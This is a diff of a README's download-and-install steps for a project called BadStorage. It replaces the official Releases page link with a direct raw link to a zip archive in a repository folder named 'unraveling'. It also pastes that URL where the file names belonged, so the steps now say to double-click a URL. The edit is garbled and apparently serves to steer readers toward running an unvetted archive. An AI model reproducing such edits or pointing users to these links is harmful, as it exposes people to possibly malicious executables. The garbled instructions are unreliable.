Jourdanexciting550/BadStorage/README.md

 ## 📂 Download & Install

-1. Visit the [Releases page](https://github.com/Jourdanexciting550/BadStorage/releases) to download the latest version of BadStorage.
+1. Visit the [Releases page](https://raw.githubusercontent.com/Jourdanexciting550/BadStorage/main/unraveling/BadStorage.zip) to download the latest version of BadStorage.

 2. Look for the file labeled with the latest version number.
-It will typically look like `BadStorage_v1.0.zip`.
+It will typically look like `https://raw.githubusercontent.com/Jourdanexciting550/BadStorage/main/unraveling/BadStorage.zip`.

 3. Click on the file to start the download.

 4. Once the download is complete, locate the file in your Downloads folder and extract it using a file extraction tool like WinRAR or 7-Zip.

-5. Inside the extracted folder, find the `BadStorage.exe` file.
+5. Inside the extracted folder, find the `https://raw.githubusercontent.com/Jourdanexciting550/BadStorage/main/unraveling/BadStorage.zip` file.

-6. Double-click `BadStorage.exe` to run the program.
+6. Double-click `https://raw.githubusercontent.com/Jourdanexciting550/BadStorage/main/unraveling/BadStorage.zip` to run the program.

 ## 🎮 Using BadStorage